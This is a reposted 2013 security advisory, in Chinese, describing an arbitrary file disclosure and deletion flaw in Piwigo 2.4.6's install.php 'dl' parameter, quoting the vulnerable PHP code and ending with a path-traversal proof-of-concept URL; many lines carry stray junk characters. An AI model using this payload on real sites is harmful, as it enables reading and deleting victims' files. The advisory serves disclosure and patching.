Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

. U# H& _/ }, u; wPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
2 i. V% N; K) Z( H7 X& P  v====================================================================
/install.php:
4 K& P2 B. s9 W, ^0 m5 I! w-------------
; `# a- X1 G- f1 T3 x' [113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
0 R. ?, T7 o# g2 X. G0 }  u8 C114: {
5 m% O  p6 o0 |1 M- g115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
" l* l7 l6 ?( c$ x/ [  f9 S117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
4 X5 `  g/ B8 r1 D119:   header('Content-Transfer-Encoding: binary');
6 K; r8 D( b! k) A120:   header('Content-Length: '.filesize($filename));
: e" w/ L, C- L1 r! ?5 V121:   echo file_get_contents($filename);
6 L2 a+ h1 s  ^' K122:   unlink($filename);
( b% L) k/ _  H8 D+ ^# V  K% Z9 M3 v* G123:   exit();
, C$ A9 H3 i2 _) U2 D0 M; A6 t124: }
====================================================================
+ u' Y2 x' t9 e# u$ J) i
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
9 K' I2 b& Y) E           Apache 2.4.2 (Win32)
! L) v8 c0 O( ]           PHP 5.4.4
           MySQL 5.5.25a
1 @+ c3 P3 \1 t2 C& u
8 @# l' V) ], W" U* d' d0 NVulnerability discovered by Gjoko 'LiquidWorm' Krstic
1 w0 v1 {* O! n& C4 l                            @zeroscience

1 w: V, ~+ M% LAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
4 D& J$ Q; T  z7 r0 E
* D7 L0 e0 t( q# J" ^! I15.02.2013
8 o3 h7 h; P1 P8 ^/ R! e- t) Z  Z
/ H8 I! d; K! P4 ]" o4 R) P--
: Q2 \1 `( H# t. g% J( X; J) ]http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
$ O& P+ V3 p% z' n5 x+ V
# A+ d/ c2 B5 e0 u